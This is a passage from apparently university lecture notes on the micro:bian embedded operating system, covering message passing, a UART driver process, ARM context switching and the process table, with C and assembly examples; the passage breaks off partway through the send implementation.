    SERIAL = start("Serial", serial_task, 0, STACK);
    TIMER = start("Timer", timer_task, 0, STACK);
    start("Heart", heart_task, 0, STACK);
    start("Prime", prime_task, 0, STACK);
}

As you can see, this calls start four times to start four processes – one each for the heart and the primes activities, and also two other processes that (as we'll see later) look after the UART and a timer. The start() function returns a small integer id that (as we'll see later) is used to identify it when sending or receiving messages; the process IDs for the serial and timer processes are saved for later use. Each process has a name, used only for debugging, a function that's called as the body of the process, and argument (all of them zero in this program) that's passed as the argument of the function, and a set amount of stack space. The constant STACK provides a decent default of 1kB for processes that don't call any deeply recursive functions. micro:bian will let us measure the amount of stack space actually used by a process so that we can trim these values later.

Simplicity: there is a fixed number of processes, all created before concurrent execution begins. Scheduling is voluntary and (apart from interrupts) non-preemptive.

Context

Bigger operating systems do a lot more than simply manage a collection of concurrent processes, valuable though that function is. Typically, an operating system will support ...

  • Processes, with a time-based scheduling scheme that supports dynamic priorities, so each process gets a fair share of the CPU in the medium term.
  • Memory management with protection, so one process cannot read or write the areas of memory assigned to another, and processes that are idle can be (partially) stored on disk to save RAM space.
  • I/O devices, so different kinds of disk present a uniform interface for programming, and programs can get ASCII characters from a keyboard rather than hardware-dependent scan codes.
  • A file system, so the fixed blocks of storage provided by the disks can be organised into larger files, arranged in a hierarchical structure of directories.
  • Networking, so client programs can be written in terms of connections between processes on different machines, not in terms of individual network packets.

We have very little of these.

And installing an operating system typically means installing a collection of utility programs, shared libraries, a GUI environment, and other things that are not properly part of the operating system itself.

Messages

Note: Update needed for changed micro:bian API.

So far, we've seen how to create concurrent processes that run independently of each other. Things get much more interesting if we allow the processes to communicate, so that they can work together. We've already had a hint that hardware devices will be looked after by their own driver processes like serial_task and timer_task. But let's start easily by making a pair of ordinary processes that talk to each other by sending and receiving messages. One will generate a stream of primes, and the other will format and print them – or even better, let's make the second process find out how many primes are less than 1000, 2000, ... It's no accident that the structure of this program is reminiscent of Haskell programs, like map show primes, that work with lazy streams.

Here's the code for a process that generates primes:

void prime_task(int arg) {
    int n = 2;
    message m;

    while (1) {
        if (prime(n)) {
            m.int1 = n;
            send(USEPRIME, PRIME, &m);
        }
        n++;
    }
}

The process tests each number, starting at 2, and if a number is prime it sends a message to another process with the id USEPRIME. To send a message, a process needs a message buffer of type message. It optionally fills in the data fields of the message buffer with information: in this case, we put a newly-discovered prime in the int1 field of the message, and leave other fields like int2 and ptr3 unset. Then there's a call to send, naming USEPRIME as the recipient of the message, and the constant PRIME to identify the type of message: it will be put in the type field of the message as it's delivered.

Here's code for another process that will run under the id USEPRIME.

void summary_task(int arg) {
    int count = 0, limit = arg;
    message m;

    while (1) {
        receive(PRIME, &m);
        assert(m.sender == GENPRIME && m.type == PRIME);

        while (m.int1 >= limit) {
            printf("There are %d primes less than %d\n",
                   count, limit);
            limit += arg;
        }

        count++;
    }
}

void init(void) {
    ...
    GENPRIME = start("GenPrime", prime_task, 0, STACK);
    USEPRIME = start("UsePrime", summary_task, 1000, STACK);
}

(For the sake of the example, I've made use of the integer argument arg to set the interval between lines of output. More commonly, the argument is used to allow multiple processes that run the same code, but behave slightly differently.)

As you can see, this receives PRIME messages sent by the GENPRIME process shown above. Again we need a message buffer to contain the message that we have received. We can specify in the RECEIVE call what type of message the process will accept, or we can write the special value ANY to allow any type of message. When the message arrives, it is stamped by the postman with the identity of the sender (so that we could reply to the same process), and the type and int1 (etc.) fields are as specified by the sender. So in the example, successive messages will have int1 fields that are successive primes in ascending order. The process counts how many are less than each multiple of its argument, and prints a summary on the serial output.

When a process tries to receive a message from another, naturally enough it must wait until the sender is ready to send a message. But for simplicity, micro:bian does a complementary thing in the other direction – when a process wants to send, it must wait until the other process wants to receive. Messages are not buffered, there is no 'mailbox' where they can sit until they are collected: instead, a message is passed from the hand of the sender directly to the hand of the receiver. If you want a different behaviour, it's possible (and easy) to program it, putting a buffer process between the sender and the receiver that can receive messages from one, store them, and pass them on to the other when it is ready for them.

If a process wants to send or receive and its counterpart is not ready, then the process cannot run any more, and the operating system picks another process to run. This explains why yield() is rarely needed: if a program contains multiple processes that are constantly communicating with each other, there are plenty of points where the scheduler can switch from one process to another. After a message has been passed from sender to receiver, both are ready to continue, and the scheduler can pick either of them, or a completely different process, to run next.

Apart from the direction of information flow, there is another asymmetry between send and receive, in that a call to send must specify which type of message to send, whereas a call to receive can specify ANY and allow messages of any type. If the message is a request for something, say the current time, then it's common to write client = m.sender and later send(client, REPLY, &m) to send back the result of the request. There's also a notation sendrec(server, type, &m) that behaves like a send() followed by a receive() that waits for a REPLY message.

Simplicity: messages have a fixed format for the whole system. Message passing is synchronous: if the receiver is not waiting the receive, then the sender must wait.

Lecture 13

Lecture 13 – Device drivers

Server processes. Interrupts as messages from the hardware.

A micro:bian program consists of a family of processes that communicate by sending and receiving messages. The transfer of a message from one process to another makes sure that the data in the message reaches its destination without damage, and we rely on this rather than on shared variables to prevent harmful interference between the actions of different processes.

If shared variables are discouraged, that suggests in particular that the buffer containing characters waiting to be output on the serial port should belong to one process rather than being shared by several – and so it is: we will introduce a device driver process for the serial port that has sole ownership of the output buffer. Other processes that want to add a character to the buffer must communicate with it by sending a message. If there is space in the buffer, the driver process will nearly always be waiting to receive a request, and so a process wanting to send a character will not have to wait very long.

(In this lecture, we'll develop a driver process for output only, but in the lab materials there's a process for both input and output, with echoing and line editing, and an interface where output characters can be transferred in bulk, without using one message per character.)

Note: Update needed for changed micro:bian API.

Our implementation of serial_putc will simply be to construct an appropriate message and send it to the SERIAL process. When the call of send completes, we know the driver process has received the message, so there's no need here to wait for a reply, though in larger systems it's often helpful to adopt a convention that every request is answered by a reply message, either positive or negative.

void serial_putc(char ch) {
    message m;
    
    if (ch == '\n') {
        m.int1 = '\r';
        send(SERIAL, PUTC, &m);
    }

    m.int1 = ch;
    send(SERIAL, PUTC, &m);
}

The operating system knows which process is running, so it can tell who called serial_putc, and can stamp the resulting message with the correct sender, though in this case the receiver doesn't care. Note that we are using an integer-size field int1 in the message to send a single character, but that doesn't cause any problems. This is a good place to implement the convention that each newline '\n' in the output is preceded by a carriage return '\r', so we don't any longer have to write "\r\n" in every string.

With this implementation of serial_putc, the USEPRIME process from the last lecture can be seen as one that accepts messages containing primes, and from time to time sends messages containing characters to print, so that its entire interaction with the world around it is sending and receiving messages.

What about the driver process? Like many such processes, it contains a loop that accepts a request, carries it out, then repeats. Here is an outline:

static void serial_task(int n) {
    static char txbuf[NBUF];    /* Circular buffer for output */
    int bufin = 0;              /* In pointer */
    int bufout = 0;             /* Out pointer */
    int bufcount = 0;           /* Character count */
    int txidle = 1;             /* True if transmitter is idle */

    message m;
    char ch;

    serial_setup();

    while (1) {
        receive(ANY, &m);

        switch (m.type) {
        case PUTC:
            ch = m.int1;
            assert(bufcount < NBUF);
            txbuf[bufin] = ch;
            bufin = wrap(bufin+1);
            bufcount++;
            break;

        ... Part A ...

        default:
            panic("serial driver got bad message %d", m.type);
        }
          
        ... Part B ...
    }
}

Note that the variables like bufcnt that were shared before are now local variables of this process, subject to no interference from other processes. I've declared the buffer itself as static, so although it is accessible only from this process, it does not take up any space on the stack.

The part of the process before the server loop starts is a good place to initialise the serial hardware. Then comes the loop, with a receive call at the top, then a switch statement that selects one of several alternatives according the type of message. Shown here are just the alternative that handles PUTC messages and the catch-all that leads to the Seven Stars of Death if the process ever receives a message it wasn't expecting.

Several questions remain to be answered:

  1. How do characters get out of the buffer and into the UART?
  2. What happens about interrupts?
  3. What happens when someone wants to send a PUTC message but the buffer is full?

We can answer the first of these questions quite easily: you'll see that the code for handling a PUTC message assumes that there's space available (we'll get to that in a minute), and adds the character to the buffer whether the UART is busy or idle. So at the place labelled Part B, we can put a fragment of code that restarts the UART if it is idle:

Part B =
        if (txidle && bufcount > 0) {
            UART_TXD = txbuf[bufout];
            bufout = (bufout+1)%NBUF;
            bufcount--;
            txidle = 0;
        }

This sets txidle to 0: we should set it to 1 again when the UART sends an interrupt. So what shall we do about interrupts? The answer is very simple: interrupts are just messages from the hardware. Somewhere in serial_setup we include the call

connect(UART_IRQ);

and this asks the operating system to turn interrupts from the UART into messages with type INTERRUPT from the fictitious process HARDWARE and deliver them to the driver process. Then at Part A we can write the following.

Part A =
        case INTERRUPT:
            if (UART_TXDRDY) {
                txidle = 1;
                UART_TXDRDY = 0;
            }
            clear_pending(UART_IRQ);
            enable_irq(UART_IRQ);
            break;

As usual, we check the reason for the interrupt, and if the UART has finished transmitting, we set txidle. The operating system reacts to each interrupt in the same way, by disabling it using disable_irq() and sending a message to the connected process. That makes it a bit complicated to clear the interrupt: we have to reset UART_TXDRDY, then use clear_pending(UART_IRQ) to clear the pending bit for the interrupt and finally enable_irq(UART_IRQ) enable the interrupt again. The pattern is always the same.

The final question is what to do when the buffer is full. Our previous approach has been to enter a loop, either polling actively, or using pause(). until it's possible to transmit the character or find space in the buffer. That approach is no longer acceptable, because there may be other processes that want to run. What works instead is to allow requests to be received only when there is buffer space to satisfy them immediately. We can replace the call

receive(ANY, &m);

with

if (bufcount < NBUF)
    receive(ANY, &m);
else
    receive(INTERRUPT, &m);

so that only interrupts are allowed through when the buffer is full. The result of that is that a process trying to send a character will itself have to wait until we are again prepared to listen to it. In a simple program, that means no further progress can be made until a UART interrupt arrives. So what happens in the meantime?

In this situation, there are no processes ready to run: not the serial driver, because that is waiting for an interrupt from the UART; not the process generating the characters, because that is waiting to send a message to the serial driver; and (we suppose) not any other process in the program. But hidden inside the operating system is a process that is always ready: the idle process whose body is

static void idle_task(void) {
    yield();
    while (1) {
        pause();
    }
}

The yield() call here is an important part of how the operating system starts up, but it's the pause() call that matters: this should be the only wfe instruction in the whole system. When no processes are ready, nothing can happen in the system until an interrupt arrives, and it's time for a snooze. An interrupt will be delivered as a message to some driver process, which can then send or receive messages with other processes, and activity can spread through the system. When the consequences of the interrupt are all worked out, perhaps all the processes will be waiting again to send or receive, and the scheduler will re-activate idle_task so it can put the system to sleep again.

Simplicity: a device driver is just a process. All interrupts are handled in the same way – but if performance is critical, we could do more in the handler.

Here's the whole device driver in one piece, with the UART initialisation code filled in:

/* serial_task -- driver process for UART */
static void serial_task(int n) {
    static char txbuf[NBUF];    /* Circular buffer for output */
    int bufin = 0;              /* In pointer */
    int bufout = 0;             /* Out pointer */
    int bufcount = 0;           /* Character count */
    int txidle = 1;             /* True if transmitter is idle */

    message m;
    char ch;

    UART_ENABLE = 0;
    UART_BAUDRATE = UART_BAUD_9600;     // 9600 baud
    UART_CONFIG = 0;                    // format 8N1
    UART_PSELTXD = USB_TX;              // choose pins
    UART_PSELRXD = USB_RX;
    UART_ENABLE = UART_Enabled;
    UART_RXDRDY = 0;
    UART_TXDRDY = 0;
    UART_STARTTX = 1;
    UART_STARTRX = 1;

    connect(UART_IRQ);
    UART_INTENSET = BIT(UART_INT_RXDRDY);
    enable_irq(UART_IRQ);

    while (1) {
        // If the buffer is full, don't accept any more requests
        if (bufcount == NBUF)
            receive(INTERRUPT, &m);
        else
            receive(ANY, &m);

        switch (m.type) {
        case INTERRUPT:
            if (UART_TXDRDY) {
                txidle = 1;
                UART_TXDRDY = 0;
            }
            clear_pending(UART_IRQ);
            enable_irq(UART_IRQ);
            break;

        case PUTC:
            ch = m.int1;
            assert(bufcount < NBUF);
            txbuf[bufin] = ch;
            bufin = wrap(bufin+1);
            bufcount++;
            break;

        default:
            badmsg(m.type);
        }
          
        // Can we start transmitting a character?
        if (txidle && bufcount > 0) {
            UART_TXD = txbuf[bufout];
            bufout = wrap(bufout+1);
            bufcount--;
            txidle = 0;
        }
    }
}

Lab 4 contains source code for a more elaborate serial driver that supports both output and input with line editing.

Lecture 14

Lecture 14 – Context switching

Implementing interleaving of processes by saving and restoring context.

To implement an operating system like micro:bian, a vital ingredient is a mechanism that switches the processor from running one client process to running another. Such a context switch might happen, for example, when one process sends a message to another. The operating system might decide to suspend the sending process and start to run the receiving process in its place. Or a context switch might happen in response to an interrupt: the processor might switch from running some background process to running the device driver to which it has delivered an INTERRUPT message. This association with interrupts gives a clue to how context switching can be implemented in general.

With the help of the "supervisor call" instruction svc, we can arrange that every entry to the operating system is via an interrupt; the svc instruction forces a special kind of interrupt to occur between it and the next instruction. When an interrupt happens, whether caused by a hardware device or by svc, some of the processor state is saved on the stack; we will extend this with a small fragment of assembly language that saves the remaining state – register r4--r7 and (in case anyone uses them) r8--r11. Just knowing the sp value at this point is enough information to restart the process, first with a little assembly language fragment that restores register r4--r11, then by means of the normal interrupt return mechanism that restores the remaining state and runs the process again.

The new ingredient compared with an ordinary interrupt is that between entry to the operating system and exit back to client processes, we will change the stack pointer. The operating system will keep a table (details later) that contains much information about each process, but in particular contains the saved stack pointer of each process that is not running. When a context switch happens, the operating system saves the sp value for the process that is suspending, and retrieves the sp value of the process that is resuming. The interrupt return mechanism then activates the new process.

Implementing this is a bit fiddly – the kind of thing that causes great rejoicing when it actually works – but the task is helped by the fact that the processor has a second stack pointer, so that (after a little configuration) there's one stack pointer psp for use by a running process, and another msp for use by the operating system. That means (a) that the operating system has its own stack, and doesn't need to steal stack space from either process; and (b) that we can use subroutines in the context switch code without worrying about messing up the process stacks.


Context switch in pictures

In detail, the steps are as follows. 1. The operating system is invoked via an svc instruction or ordinary interrupt.

2. The hardware saves some of its state on the process stack as before; but it is configured to switch to using the main stack pointer msp before entering the handler for svc or the interrupt. In what follows, we concentrate on a system call mediated by svc.

Context switch – part 1

3. The handler for the svc interrupt saves the remaining processor state on the stack belonging to the process.

4. The operating system is entered at system_call, using the main stack in place of the process stack.

Context switch – part 2

5. The operating system may have internal subroutines whose stack frames occupy space on the main stack.

Context switch – part 3

6. When the operating system returns, it provides a value for the process stack pointer that may be different from the previous value, so that it is a different process that resumes.

Context switch – part 4

7. The additional saved state is from the new process is restored, and the system call handler triggers a return-from-interrupt event.

Context switch – part 5

8. The hardware restores the parts of the state it saved earlier, but with values that belong to the new process.

9. The new process starts to run.

Context switch – part 6

Context switch in code

Now let's tell the same story again, but with fragments of code. The story begins with a system call stub, a function that can be called from the body of a process and implements a kernel call such as yield or send by gathering the arguments and issuing a supervisor call instruction svc, with an integer argument that indicates which system call it is. The macro syscall turns into a single svc instruction.

void NOINLINE yield(void)
{
    syscall(SYS_YIELD);
}

void NOINLINE send(int dest, int type, message *msg)
{
    syscall(SYS_SEND);
}

These routine are marked NOINLINE to disable the compiler optimisation that substitutes the body of a (non-recursive) subroutine for the text of its call – that way, we can be sure that the arguments of send appear in registers r0 to r2, and the operating system can then discover them by reaching into the stack of the process.

Here is the code that implements the interrupt handler for the svc interrupt (from mpx-m0.s):

svc_handler:
    isave                   @ Complete saving of state; r0 = stack pointer
    bl system_call          @ Perform system call; r0 = system_call(r0)
    irestore                @ Restore saved state from r0

I've implemented isave and irestore as assembly-language macros whose expansion will be inserted textually wherever they appear; they could be made into subroutines to save code space, but that would be slower, and these would be the only subroutines in the course that did not obey the ARM calling conventions.

The helper routines isave and ireturn implement the saving of that part of the state that is not saved by the hardware on interrupt. In the interests of full disclosure, here is code for isave:

@@@ isave -- save context for system call
    .macro isave
    mrs r0, psp                 @ Get thread stack pointer
    subs r0, #36
    movs r1, r0
    mov r3, lr                  @ Preserve magic value 0xfffffffd
    stm r1!, {r3-r7}            @ Save low regs on thread stack
    mov r4, r8                  @ Copy from high to low
    mov r5, r9
    mov r6, r10
    mov r7, r11
    stm r1!, {r4-r7}            @ Save high regs in thread stack
    .endm                       @ Return new thread sp

In this code, the first instruction fetches the process stack pointer into r0: the mrs instruction (Move to Register from Special) can be used to access multiple special registers inside the processor, and has a counterpart called msr that we'll use later. Also new here is the stm instruction that (like push) stores multiple registers in consecutive words of memory. Unlike push, this can use an arbitrary register for the address where the values are stored, and it modifies that register (that's what the ! means) by the size of the data saved, in this case 16 bytes. Annoyingly, however, unlike push it increments the address rather than decrementing it, and that's the reason for the three instructions that adjust r0 by multiples of 16. Also a bit irritating is that fact stm cannot store from the high registers, so we must laboriously move r8--r11 into r4--r7 before saving them. We are really earning our money here.

You can guess the implementation of irestore: it is a bit easier because the ldm instruction that's dual to stm does go in the direction we want, and it ends with msr psp, r0 to set the process stack pointer.

And here is the layout of the frame that is pushed by hardware and software onto the stack of the suspended process:

--------------------------------------
16  PSR  Status register
15  PC   Program counter
14  LR   Link register
13  R12
12  R3
11  R2           (Saved by hardware)
10  R1
 9  R0   Process argument
--------------------------------------
 8  R11  
 7  R10
 6  R9
 5  R8           (Saved manually)
 4  R7 
 3  R6 
 2  R5
 1  R4
 0  MAGIC
--------------------------------------

It's right to save this information on the process stack, because the register values are specific to the process, and will be needed again precisely when the process is resumed. The address at which r8 has been saved is the one that is recorded as the stack pointer of the suspended process.

The function system_call is written in C, and is the entry point of the operating system for system calls written with svc. Its heading is

unsigned *system_call(unsigned *sp),

showing that it is passed as a parameter the process stack pointer of the process that is being suspended, and returns as a result the stack pointer for the process to be resumed. As we'll see later, the system_call function can decode the state of the suspended process to find out what system call (such as yield(), send(), receive()) was requested, and what its parameters were.

Note: Update needed for changed micro:bian API.

Here's an outline of the implementation of system_call.

#define arg(i, t) ((t) psp[R0_SAVE+(i)])

/* system_call -- entry from system call traps */
unsigned *system_call(unsigned *psp)
{
    short *pc = (short *) psp[PC_SAVE]; /* Program counter */
    int op = pc[-1] & 0xff;      /* Syscall number from SVC instruction */

    /* Save sp of the current process */
    os_current->sp = psp;

    switch (op) {
    case SYS_YIELD:
        make_ready(os_current);
        choose_proc();
        break;

    case SYS_SEND:
        mini_send(arg(0, int), arg(1, int), arg(2, message *));
        break;

        ...
    }

    /* Return sp for next process to run */
    return os_current->sp;
}

This implementation finds the program counter value for the suspended process by reaching into the saved state on its stack; later it will find the system call arguments in a similar way. Then it looks at the svc instruction that invoked the operating system (at offset −2 bytes from the PC) to find out what system call this is. The stack pointer for the process just suspended it saved in the process table entry os_current. Then a switch statement selects an action appropriate to the system call: switching to a different process, sending a message, and so on. As part of this action, the function choose_proc() may be used to select a different process as the value of os_current: this happens directly in the case of the yield() system call, and may happen indirectly with send() or recieve(), particularly if the current process becomes blocked. The system_call() process returns the SP value of this new process to svc_handler in r0, and it's this SP value that is used to resume the process that is now selected as current.

It's up to the operating system to decide (as a matter of policy) which process should get to run next. What we're concentrating on for the moment is the mechanism by which that policy is put into effect. If the operating system wants the currently executing process to carry on, it can simply return the same stack pointer it received, and the context switching mechanism will then return to the same process that it suspended when the call was made.

The explanation above captures well enough what happens once a program is running, but any explanation will be unsatisfying if it doesn't reveal what happens when the program is starting up. There are two aspects to this: how each process starts, and how the entire system starts.

The operating system resumes each process by the return-from-interrupt mechanism, and that applies also to the time when the process first starts up. To provide for this, when the process is set up it is given a fake exception frame on its stack. This is done in the function start in microbian.c, which depends on the frame layout shown above. It sets up the fake frame so that

  • r0 contains the integer argument that will be passed to the process.
  • pc contains the address of the function body. The LSB should not be set, or the result is UNPREDICTABLE (ARM manual, page B1-201), though in practice this causes no problems.
  • The value of psr doesn't matter much, but it should have the bit set that indicates Thumb mode. (There's a great sense of relief when you finally get such details right.)
  • The value of lr determines what happens if the process body should ever return. By setting it to the address of exit, we arrange for the process to terminate cleanly in this case.
  • Other registers can have arbitrary values, so it's safe to leave them as zero.

These values, saved on the initial stack for the process, ensure that when the process is first activated by the return-from-interrupt mechanism, it starts to run the process body with the supplied argument.

We also want to know how the whole system starts. The first process to run is a special process IDLE, belonging to the operating system itself, that will later become the process that runs when there is no other process ready to run. It contains an infinite loop with the only wfe instruction in the whole system. The idle process is created by a function __start() that is called very early in the start-up sequence.

/* __start -- start the operating system */
void __start(void)
{
    /* Create idle task as process 0 */
    idle_proc = create_proc("IDLE", IDLE_STACK);
    idle_proc->state = IDLING;
    idle_proc->priority = P_IDLE;

    /* Call the application's setup function */
    init();

    /* The main program morphs into the idle process. */
    os_current = idle_proc;
    set_stack(os_current->sp);
    yield();

    idle_task();
}

void idle_task(void)
{
    /* This process only runs again when there's nothing to do. */
    while (1) pause();
}

The function __start() first creates the idle process, then calls the user-supplied function init() to create the other processes in the system. After this, the processor switches (via set_stack() into the mode where there are separate stacks for operating system and for processes, and then calls idle_task(), the body of the idle process. A call to yield lets the operating system choose other, genuine, processes to run, and after that the idle process runs only when there are no other processes ready. It falls into an infinite loop that repeatedly calls pause() to wait for the next interrupt.

The helper routine setstack() uses a couple of special instructions to do its job: msr allows values to be moved into special registers in the processor like psp. Setting the control register to 2 enables the use of psp as the stack pointer, and the isb instruction is there to ensure that no instructions in the pipeline use the old stack pointer.

setstack:
    msr psp, r0             @ Set up the stack
    movs r0, #2             @ Use psp for stack pointer
    msr control, r0
    isb                     @ Drain the pipeline
    bx lr

Summary: By saving the whole state of a process on its stack, we can implement context switches from a process to the OS kernel and then to a different process. There's always some system-dependent detail to this, and a bit of assembly-language cleverness, but in outline it is always similar.

This lecture covers the mechanism that supports multiple, interleaved processes; we have not yet touched on the separate policy that determines which process should run at each time.

Context

More than any other code shown in this course, the context switch code shown here is architecture-dependent. Every machine capable of supporting multitasking makes it possible to save the machine state in this way, and restore it in order to revive a suspended process. Using the interrupt mechanism uniformly to enter the operating system is a very common approach.

Context switch for a simple machine like a microcontroller is itself quite simple. But for a more complex machine with an MMU, it is a more far-reaching operation. Each process has its own mapping from a virtual address space to physical addresses in the RAM that makes it appear to the process that it alon occupies the memory of the machine, and prevents any process from interfering with the memory occupied by others. When control is transferred from one process to another, or from a process to the operating system, this mapping must also be updated. Simpler machines may require the memory occupied by each process to occupy a contiguous region in the RAM, but more sophisticated machines divide the memory into pages that may be arbitrarily arranged to form the memory belonging to a process, and some of them may be stored not on RAM but on disk, to be retrieved by the operating system when the process needs access to them. All this adds up to quite a lot of state that must be saved and restored at a context switch.

A refinement

The above account describes a feasible scheme for implementing interrupts and context switch, but as it is currently implemented, micro:bian does something a little more refined. System calls do indeed cause a full context switch as described, with hardware and software collaborating to save the whole process state. On the other hand, interrupts do only a partial context switch, using the hardware supported mechanism to save some state and call an interrupt handler subroutine. If that subroutine – part of the operating system – decides that a full context switch is needed, then it uses the machine's mechanism for a "pending supervisor call" to request one. When this PendSV feature is activated, a special kind of interrupt is generated, and the operating system provides a handler for this interrupt that saves the complete state and performs the desired context switch.

The hardware optimises things so that this two-stage process for handling an interrupt that generates a message is not much slower overall than the simpler scheme of saving all the state immediately. The chief advantage of this more refined scheme is that it is possible to install a specially-written interrupt handler for a particularly time-critical interrupt and have it get control more quickly than under the simpler scheme. In the case where no message need be sent, the whole process of handling an interrupt can be made much faster in this way.

Lecture 15

Lecture 15 – Implementing processes and messages

Process table. Ready queue. Send and receive.

Context switching as implemented in the previous lecture gives us a platform on which we can implement a process scheduler with no further magic: the scheduler is simply a program that receives calls to send, receive and other, similar, functions and decides the order in which processes should run. In this lecture, we look at the data structures and the algorithms that are used to make these decisions.

Process table

micro:bian keeps information about each process in a structure (source).

typedef struct _proc *proc;

struct _proc {
    int pid;                 /* Process id */
    char name[16];           /* Name for debugging */
    unsigned state;          /* SENDING, RECEIVING, etc. */
    unsigned *sp;            /* Saved stack pointer */
    void *stack;             /* Stack area */
    unsigned stksize;        /* Stack size (bytes) */
    int priority;            /* Priority: 0 is highest */
    
    proc waiting;            /* Processes waiting to send */
    int pending;             /* Whether INTERRUPT message pending */
    int msgtype;             /* Message type to send or receive */
    message *message;        /* Pointer to message buffer */

    proc next;               /* Next process in ready or send queue */
};

/* Possible state values */
#define DEAD 0
#define ACTIVE 1
#define SENDING 2
#define RECEIVING 3
#define SENDREC 4
#define IDLING 5

The gist of this is that each process will be represented by a structure containing certain fixed fields. Space for the structure will be allocated when a process is created, not here. Two of the fields, waiting and next, are pointers to other processes, and by means of them we can construct linked lists of process records, without having to use malloc or its equivalent to allocate storage dynamically: that's good, because dynamic storage allocation is difficult to do well in limited memory, and potentially too slow to incorporate in the heart of our operating system.

Each process has

  • an integer process id.
  • a string name, copied from the string given when the process was created. This is used in a function that dumps the state of all processes (a counterpart to the ps command of unix). Also the name of the current process could be printed in case of a panic, just before the Seven Stars of Death appear.
  • an integer state that has one of the values listed later.
    • DEAD indicates a process that has exited. It is also the value present in slots of the table that have never been used.
    • ACTIVE indicates a process that is ready to run. The process is either the current process, or the ready queue waiting to become current.
    • SENDING indicates that the process is waiting to send to another; the process will appear in the sending queue of the destination.
    • RECEIVING indicates that the process is waiting to receive a message; the accept field will specify who may send to it.
    • SENDREC indicates a call to sendrec, combining the functions of send and receive.
    • IDLING indicates the idle process, which runs when no other process is ready.
  • three pieces of information about the stack of the process, which contains all its state: the current stack pointer sp, the base of the stack area stack, and its size size. The base and size of the stack are used in the process dump, which attempts to find out how much of the allocated space has actually been used. The stack pointer is of more vital importance, because it is needed in order to resume the process after a system call.
  • a small integer priority for the process. Possible values are from 0 to 3, with 0 (the most urgent) reserved for processes that are connected to interrupts, 1 and 2 (with symbolic names P_HIGH and P_LOW allowed for normal processes, and 3 reserved for the idle process, which runs only when no other process is ready.
  • some fields that are used to save information about processes that are waiting to send or receive.
    • if waiting is not null, it points to a list of processes waiting to send to this one.
    • pending is non-zero if an interrupt message is waiting to be delivered to this process.
    • if the process is in state RECEIVING, then msgtype determines what types of message the process is willing to receive: either a specific message type, or the special value ANY.
    • if the process is in state SENDING or RECEIVING (or SENDREC), then message is a pointer to the message buffer passed in the call to send or receive (or sendrec). This buffer may be in the stack space of the process, and may be NULL@ if there is no additional data to pass as part of the message.
  • a pointer next that can be used to link the process into a queue, contining either processes waiting to run, or processes waiting to send a message.

Ready queue

The ready queue

There are three queue structures, corresponding to priorities 0, 1, and 2. There's no need for a queue structure for priority level 3, because that level always contains exactly one process, the idle process, which is always ready to run (source).

Each queue structure has two pointers: one to the head of the queue and another to the tail. If the queue is empty, then both of these pointers are null, and it the queue contains one process, then both head and tail point to it. In each case, it's quick to add a process to the end of the queue, or to remove a process from the front.

In order to find the ready process with the highest priority, we need to look at each queue structure in turn, but that doesn't take long if there are only a few different priority levels. With a more elaborate system of priorities, a more carefully designed data structure might be needed; but the number of processes might have to grow quite large before clever data structures gained any advantage, even if the running time of operations on them was asymptotically better.

All the processes that are on a ready queue are in the ACTIVE state.

Processes queueing to send

There are other queues for processes that are waiting to send a message and are in the SENDING state. In fact, each process has two pointers in its record: one called next for linking it into a queue, and another called waiting that points to the head of a queue of processes waiting to send to it. Because these queues are usually short, we don't bother with a pointer to the tail of the queue, but just find it when we want by chaining along the list.

In the picture, there is an ACTIVE process that is busy doing something, and three processes are waiting to send it a message when it has finished. One of these processes itself has a third process waiting to send to it: for that to happen, the first process must accept the message from the second process, allowing the second process to proceed, and the second process must then call receive to allow the third process to deliver its message.

In the diagram, there is also a process that is in RECEIVING state, waiting to receive a message. It is not linked to any sender, but potential senders know its process id, and can get in touch when they are ready to send. In addition, there is a process that is in RECEIVING state but nevertheless has another process waiting to send to it. That process must have asked to receive a message with a specific type, and the process that is waiting wants to send a different type of message. The receiving process will have to receive first the message it is waiting for; then perhaps it will call receive again and accept the message from the waiting process.

As the diagram shows, any process that is not DEAD (or the idle process), and is not currently waiting to receive from ANY, can have a queue of other processes waiting to send. Each waiting process is in SENDING state (so is not on the ready queue), and can be on the queue of only one process – the one it is hoping to send to. Therefore, we can manage with only one next link for each process, and we don't have to allocate storage dynamically to cope with any eventuality that might arise.

Not shown here

There are a couple of possibilities not shown in these diagrams: they add only details to the story, so do not need to be included in a first telling.

As well as send and receive, there is an operation sendrec(dst, type, msg) that combines both, equivalent to send(dst, type, msg) followed by receive(REPLY, msg). This single operation neatly captures the idiom of sending a request to a server and waiting for a reply. Besides the brevity that it offers, it is also a bit more efficient, and avoids a potential problem known as priority inversion. Supporting sendrec means adding another process state, called SENDREC. A process in this state is waiting to send to some destination, and will be on the destination's queue. When it has succeeded in sending, its state becomes RECEIVING, just as a process in state SENDING will enter state ACTIVE at the same moment.

As well as receiving a message from a process that is waiting in its queue, a driver process that calls receive can get an INTERRUPT message from the fictitious process HARDWARE. Such messages are not reflected in the queue of senders but by setting the pending flag for the process. If an interrupt is pending, then it jumps the queue and is delivered before any message from a waiting process.

Send and receive

When a process calls send, there are two possibilities.

  • If the destination process is in state RECEIVING, and it is prepared to accept a message of this type, then the message can be copied immediately, and both the sender and the receiver are now ready to run.
  • If the destination process is not waiting for a message of this type, then the sender must be suspended and join the destination's queue (at the end, it being a queue). Since the sender cannot continue, there must be a call to choose_proc to find another process to run.

When a process calls receive, three possibilities must be considered.

  • If the process is connected to an interrupt, and an interrupt is pending, then an INTERRUPT message should be delivered, and the process continues in order to service it.
  • If not, and some other process is waiting to send to this one, then the message can perhaps be delivered immediately. If the process is hoping to receive a specific type of message, we must search the queue to see if a process is waiting to send a message of the right type; otherwise, the first process on the queue is taken. After the message is copied, both sender and receiver are ready to run. The need to search the queue here means that we must accept that some operations on sender queues will take time proportional to the length of the queue, and partially justifies traversing the queue also to add a process to the end.
  • If there is not acceptable process waiting, then the caller must be suspended in state RECEVIING.

Both send (implemented by mini_send) and receive (implemented by mini_receive) are system calls that are handled by the operating system after it as been entered by the system call mechanism. System calls and all interrupts have the same priority in micro:bian, so we can be sure that the operations on queues needed to implement the system calls will not be interrupted: this is much simpler than generally allowing interrupts to system calls and disabling interrupts when necessary, but it means that interrupts will occasionally be disabled for a relatively long time.

System calls arrive in the operating system via the interrupt mechanism at the function system_call (source), which decodes the arguments of the call by delving into the exception frame. Going into more detail, we can look at a function mini_send (source) that implements the send operation and is invoked from the system call interface.

Note: Update needed for changed micro:bian API.

/* mini_send -- send a message */
static void mini_send(int dest, int type, message *msg)
{
    int src = os_current->pid;
    proc pdest = os_ptable[dest];

    if (dest < 0 || dest >= os_nprocs || pdest->state == DEAD)
        panic("Sending to a non-existent process %d", dest);

